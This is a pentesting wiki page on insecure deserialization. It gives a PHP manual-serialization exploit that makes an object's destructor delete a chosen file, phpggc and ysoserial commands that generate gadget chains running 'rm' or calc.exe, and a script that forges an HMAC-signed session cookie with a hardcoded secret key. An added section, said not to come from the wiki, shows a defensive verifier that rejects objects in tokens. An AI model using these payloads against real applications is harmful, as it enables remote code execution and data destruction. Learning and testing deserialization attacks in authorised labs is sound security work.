wiki.hackerlab.cz
Insecure Deserialization

Manual and gadget chain manipulation

PHP

Manual serialization

Manual serialization, overriding the class's internal members (this requires access to the application source code), in order to reach a specific piece of functionality.

<?php
// the app's class definition deletes the referenced file in its __destruct() method;
// the object is instantiated from the "session" cookie

class CustomTemplate {
    // declare the property with the same visibility as the target class (public here):
    // private/protected property names are mangled in the serialized form
    public $template_file_path;
}

$c = new CustomTemplate();
$c->template_file_path = "/path/file-to-delete.txt";

// final serialized PHP object
echo serialize($c);

/* output
O:14:"CustomTemplate":1:{s:18:"template_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>

PHPGGC

Automatic gadget chain generation when no source code review is possible.

git clone https://github.com/ambionics/phpggc.git
phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0

SHA1-HMAC - PHP signed gadget chain

<?php

// base64-encoded phpggc payload generated in the previous step
$phpggc_object = "<base64 phpggc payload>";
// application secret key used to sign the token
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";

// cookie format expected by the application: JSON with the token and its HMAC-SHA1 signature
$cookie = urlencode('{"token":"' . $phpggc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpggc_object, $secretKey) . '"}');
echo $cookie;
?>
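For the other side of the same cookie format, here is an added example (not from this wiki) of a verifier that checks the signature in constant time and still refuses to instantiate classes from the token; verify_session_cookie(), contains_object() and the demo key are assumed names and constructed values.

```php
<?php
// Added example, not the wiki's code: function names and the demo key are assumed.
function contains_object($value): bool
{
    if (is_object($value)) {
        return true;
    }
    foreach (is_array($value) ? $value : [] as $item) {
        if (contains_object($item)) {
            return true;
        }
    }
    return false;
}
function verify_session_cookie(string $rawCookie, string $secretKey): array
{
    $data = json_decode(urldecode($rawCookie), true);
    if (!is_array($data) || !isset($data['token'], $data['sig_hmac_sha1'])) {
        return ['ok' => false, 'reason' => 'malformed cookie'];
    }
    $token = (string) $data['token'];
    // hash_equals() compares in constant time; a plain == leaks timing.
    if (!hash_equals(hash_hmac('sha1', $token, $secretKey), (string) $data['sig_hmac_sha1'])) {
        return ['ok' => false, 'reason' => 'bad signature'];
    }
    $serialized = base64_decode($token, true);
    if ($serialized === false) {
        return ['ok' => false, 'reason' => 'token is not base64'];
    }
    // allowed_classes => false turns every object into __PHP_Incomplete_Class,
    // so no __wakeup()/__destruct() gadget runs even if the key has leaked.
    $value = @unserialize($serialized, ['allowed_classes' => false]);
    if ($value === false && $serialized !== 'b:0;') {
        return ['ok' => false, 'reason' => 'unparseable token'];
    }
    if (contains_object($value)) {
        // A legitimate session never carries objects: reject and alert.
        return ['ok' => false, 'reason' => 'object in session token'];
    }
    return ['ok' => true, 'session' => $value];
}
// Constructed demo: a plain session, then the CustomTemplate object from above, both signed with the demo key.
$key = 'demo-key-not-the-real-one';
foreach (['a:1:{s:4:"user";s:5:"alice";}',
          'O:14:"CustomTemplate":1:{s:18:"template_file_path";s:24:"/path/file-to-delete.txt";}'] as $s) {
    $token = base64_encode($s);
    $cookie = urlencode(json_encode(['token' => $token, 'sig_hmac_sha1' => hash_hmac('sha1', $token, $key)]));
    echo verify_session_cookie($cookie, $key)['reason'] ?? 'ok', "\n";
}
```

Only the first cookie is accepted; the second is rejected with "object in session token" even though its signature is valid.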

Java

# the repository does not ship a built jar
git clone https://github.com/frohoff/ysoserial.git
# download a prebuilt jar from JitPack instead
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
java -jar ysoserial.jar CommonsCollections4 calc.exe
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt' | base64 -w0

.NET

git clone https://github.com/pwntester/ysoserial.net.git
Last updated 1 year ago